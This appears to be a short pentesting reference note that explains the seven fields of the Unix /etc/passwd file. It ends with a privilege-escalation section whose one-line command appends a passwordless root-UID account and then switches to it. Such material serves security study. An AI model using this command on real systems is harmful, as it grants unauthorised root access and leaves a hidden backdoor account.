Passwords

The /etc/passwd file is a text file with each line describing a user account.
Each line consists of seven fields separated by a colon.
Here is an example of a recording:

jsmith:x:1001:1000:Joe Smith,Room 1007,(234)555-8910,(234)5550044,email:/home/jsmith:/bin/sh
  • jsmith: login name.
  • x : a x means password hash is stored in the /etc/shadow file, which is only readable by the root account. A * prevents connections from an account while keeping its username. In early versions of unix, this field contained the cryptographic hash of the user's password.
  • 1001 : UID - User ID
  • 1000 : GID - Group ID. A number, identifying the user main group.
  • Joe Smith,Room 1007,(234)555-8910,(234)5550044,email : Gecos field. A comment that describes the person or account. Usually a comma-separated set of values, providing the user's full name and contact information.
  • /home/jsmith : account home directory.
  • /bin/sh : shell program used by the user. Can be nologin.

The first lines of the file are usually system accounts.
User accounts are often described in the last lines.
This file allows to quickly identify users, applications (tomcat, mysql, www_data,...), their working directories, and whether or not they have access to a shell.

Wikipedia: https://en.wikipedia.org/wiki/Passwd

Privilege Elevation - Unix

If you have the rights to modify /etc/passwd, you can be root. For example tee with a sudo as root. Add an entry with a UID of 0 (root UID), and an empty password.

echo myroot::0:0:::/bin/bash | sudo tee -a /etc/passwd 
su myroot